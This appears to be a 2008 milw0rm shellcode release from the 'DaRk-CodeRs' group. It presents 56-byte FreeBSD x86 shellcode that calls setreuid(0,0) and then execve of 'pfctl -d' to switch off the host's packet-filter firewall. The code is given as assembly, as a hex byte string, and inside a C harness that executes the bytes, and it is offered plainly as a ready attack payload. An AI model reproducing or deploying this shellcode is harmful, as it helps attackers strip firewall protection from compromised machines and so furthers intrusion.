71 lines
No EOL
1.6 KiB
Text
71 lines
No EOL
1.6 KiB
Text
***(C)oDed bY suN8Hclf***
|
|
DaRk-CodeRs Group production, kid
|
|
[FreeBSD x86 setreuid(0, 0) + execve(pfctl -d) 56 bytes]
|
|
|
|
The simples way to disable the FreeBSD's packet filter. We do not
|
|
flush all rules (pfctl -F all) but only turn the firewall off.
|
|
|
|
Assembly code:
|
|
-------------------------code.asm--------------------------
|
|
section .text
|
|
global _start
|
|
|
|
_start:
|
|
|
|
xor eax, eax
|
|
push eax
|
|
push eax
|
|
mov al, 126
|
|
push eax
|
|
int 0x80 ; setreuid()
|
|
|
|
xor eax, eax
|
|
push eax
|
|
push word 0x642d
|
|
mov ecx, esp ; ecx contains a pointer to "-d" string
|
|
|
|
push eax
|
|
push 0x6c746366
|
|
push 0x702f6e69
|
|
push 0x62732f2f
|
|
mov ebx, esp ; ebx contains a pointer to "//sbin/pfctl" string
|
|
|
|
push eax
|
|
push ecx
|
|
push ebx
|
|
mov ecx, esp
|
|
|
|
push eax
|
|
push ecx
|
|
push ebx
|
|
mov al, 0x3b
|
|
push eax
|
|
int 0x80 ; execve()
|
|
|
|
xor eax, eax
|
|
push eax
|
|
push eax
|
|
int 0x80 ; exit()
|
|
-------------------------code.asm--------------------------
|
|
And C code:
|
|
-------------------------code.c----------------------------
|
|
#include <stdio.h>
|
|
|
|
char shellcode[]=
|
|
"\x31\xc0\x50\x50\xb0\x7e\x50\xcd\x80\x31\xc0\x50\x66\x68\x2d\x64"
|
|
"\x89\xe1\x50\x68\x66\x63\x74\x6c\x68\x69\x6e\x2f\x70\x68\x2f\x2f"
|
|
"\x73\x62\x89\xe3\x50\x51\x53\x89\xe1\x50\x51\x53\xb0\x3b\x50\xcd"
|
|
"\x80\x31\xc0\x50\x50\xcd\x80";
|
|
|
|
int main(int argc, char *argv[]){
|
|
int (*func)();
|
|
func=(int (*)())shellcode;
|
|
(int)(*func)();
|
|
}
|
|
-------------------------code.c----------------------------
|
|
|
|
Greetz to: 0in, cOndemned (and to other DaRk-CodeRs members), str0ke, e.wiZz!,
|
|
Katharsis, doctor and many others...
|
|
Visit us : www.dark-coders.pl
|
|
|
|
# milw0rm.com [2008-09-12] |